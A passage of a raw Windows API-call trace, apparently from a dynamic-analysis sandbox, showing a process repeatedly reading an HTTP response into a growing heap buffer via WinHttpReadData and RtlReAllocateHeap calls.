	[0187.153] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.153] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x27f00) returned 0x2732590
	[0187.155] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x275848f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x275848f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.155] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.156] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x29f00) returned 0x275a498
	[0187.157] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x2782397, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2782397*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.157] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.158] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x275a498, Size=0x2bf00) returned 0x27843a0
	[0187.159] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27ae29f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27ae29f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.159] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.160] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27843a0, Size=0x2df00) returned 0x2732590
	[0187.160] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x275e48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x275e48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.160] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.160] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x2ff00) returned 0x2732590
	[0187.160] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276048f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276048f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.160] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.161] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x31f00) returned 0x2732590
	[0187.161] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276248f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276248f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.161] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.161] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x33f00) returned 0x2732590
	[0187.161] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276448f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276448f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.161] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.161] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x35f00) returned 0x2732590
	[0187.161] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276648f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276648f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.161] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.162] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x37f00) returned 0x2732590
	[0187.162] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276848f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276848f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.162] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.182] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x39f00) returned 0x2732590
	[0187.182] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276a48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276a48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.182] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.183] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x3bf00) returned 0x2732590
	[0187.183] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276c48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276c48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.183] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.188] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x3df00) returned 0x2732590
	[0187.188] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x276e48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x276e48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.188] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.189] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x3ff00) returned 0x2732590
	[0187.189] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277048f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277048f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.189] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.189] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x41f00) returned 0x2732590
	[0187.189] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277248f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277248f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.189] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.189] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x43f00) returned 0x2732590
	[0187.190] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277448f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277448f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.190] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.193] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x45f00) returned 0x2732590
	[0187.193] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277648f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277648f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.193] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.194] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x47f00) returned 0x2732590
	[0187.194] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277848f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277848f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.194] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.195] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x49f00) returned 0x2732590
	[0187.195] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277a48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277a48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.196] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.196] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x4bf00) returned 0x2732590
	[0187.196] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277c48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277c48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.196] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.197] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x4df00) returned 0x2732590
	[0187.197] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x277e48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x277e48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.197] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.197] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x4ff00) returned 0x2732590
	[0187.197] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278048f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278048f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.197] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.242] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x51f00) returned 0x2732590
	[0187.242] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278248f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278248f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.242] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.243] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x53f00) returned 0x2732590
	[0187.243] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278448f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278448f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.243] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.243] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x55f00) returned 0x2732590
	[0187.243] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278648f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278648f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.243] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.243] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x57f00) returned 0x2732590
	[0187.243] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278848f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278848f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.243] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.244] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x59f00) returned 0x2732590
	[0187.244] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278a48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278a48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.244] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.244] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x5bf00) returned 0x2732590
	[0187.244] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278c48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278c48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.244] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.244] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x5df00) returned 0x2732590
	[0187.244] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x278e48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x278e48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.244] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.245] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x5ff00) returned 0x2732590
	[0187.245] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279048f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279048f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.245] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.245] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x61f00) returned 0x2732590
	[0187.245] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279248f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279248f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.245] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.245] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x63f00) returned 0x2732590
	[0187.245] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279448f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279448f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.245] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.246] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x65f00) returned 0x2732590
	[0187.246] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279648f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279648f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.246] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.246] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x67f00) returned 0x2732590
	[0187.246] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279848f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279848f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.246] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.246] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x69f00) returned 0x2732590
	[0187.246] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279a48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279a48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.246] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.247] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x6bf00) returned 0x2732590
	[0187.247] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279c48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279c48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.247] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.264] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x6df00) returned 0x2732590
	[0187.264] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x279e48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x279e48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.264] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.265] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x6ff00) returned 0x2732590
	[0187.265] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27a048f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a048f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.265] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.265] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x71f00) returned 0x2732590
	[0187.265] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27a248f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a248f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.266] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.266] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x73f00) returned 0x2732590
	[0187.266] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27a448f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a448f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.266] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.266] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x75f00) returned 0x2732590
	[0187.266] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27a648f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a648f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.266] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.267] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x77f00) returned 0x2732590
	[0187.267] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27a848f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27a848f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.267] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.273] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x79f00) returned 0x2732590
	[0187.273] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27aa48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27aa48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.273] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.273] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x7bf00) returned 0x2732590
	[0187.273] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27ac48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27ac48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.274] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.274] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x7df00) returned 0x2732590
	[0187.274] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27ae48f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27ae48f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.274] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.274] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x7ff00) returned 0xdb0020
	[0187.279] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xe2df1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe2df1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.279] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.279] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x81f00) returned 0xe30020
	[0187.289] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xeaff1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xeaff1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.289] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xe30020, Size=0x83f00) returned 0x2490020
	[0187.298] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x2511f1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2511f1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.298] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.298] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2490020, Size=0x85f00) returned 0xdb0020
	[0187.310] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xe33f1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe33f1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.310] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.311] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x87f00) returned 0xe40020
	[0187.322] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xec5f1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xec5f1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.322] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.322] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xe40020, Size=0x89f00) returned 0xdb0020
	[0187.335] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xe37f1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe37f1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.335] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
